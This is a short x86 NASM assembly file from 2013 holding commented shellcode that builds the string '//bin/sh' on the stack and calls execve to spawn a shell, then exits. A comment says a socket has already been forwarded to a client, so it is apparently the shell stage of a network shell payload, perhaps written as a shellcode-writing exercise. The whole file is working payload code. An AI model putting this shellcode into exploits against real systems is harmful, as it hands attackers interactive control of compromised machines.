; Filename: execve-stack.nasm
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March

global _start


section .text

_start:

        ; 
        ; =============================== EXECVE =====================================
        ;
	; Now as we forwarded sockfd to a client, we can spawn shell.
       	; Prepare the path, in little-endian, using the Python
        ; >>> '//bin/sh'[::-1].encode('hex')
        ; '68732f6e69622f2f'
        ;
        ; int execve(const char *filename, char *const argv[], char *const envp[]);
        ; EAX           EBX,                    ECX,            EDX
        ; 11            '//bin/sh'              PTR to EBX      NULL
       	;
        ;

	; EAX
	xor eax, eax
        mov al, 11              ; execve syscall

        ; EBX
        xor edx, edx
	push edx                ; NULL termination of '//bin/sh' string
        push 0x68732f6e         ; '//bin/sh' in reverse
        push 0x69622f2f         ; beginning of '//bin/sh' string is here
        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp

	; ECX
        push edx                ; NULL termination of a stack
        push ebx                ; load our '//bin/sh' on a stack
        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.

        ; EDX
        push edx                ; NULL terminator
        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
        int 0x80

	
	; === EXIT(0) ===
	; void _exit(int status);
	; /usr/include/asm/unistd_32.h:#define __NR_exit		  1
	xor eax, eax	; EAX = 0x000000
	mov al, 1	; EAX = 0x000001	1: exit syscall
	xor ebx, ebx	; EBX = 0x000000	0: success status
	int 0x80


;section .data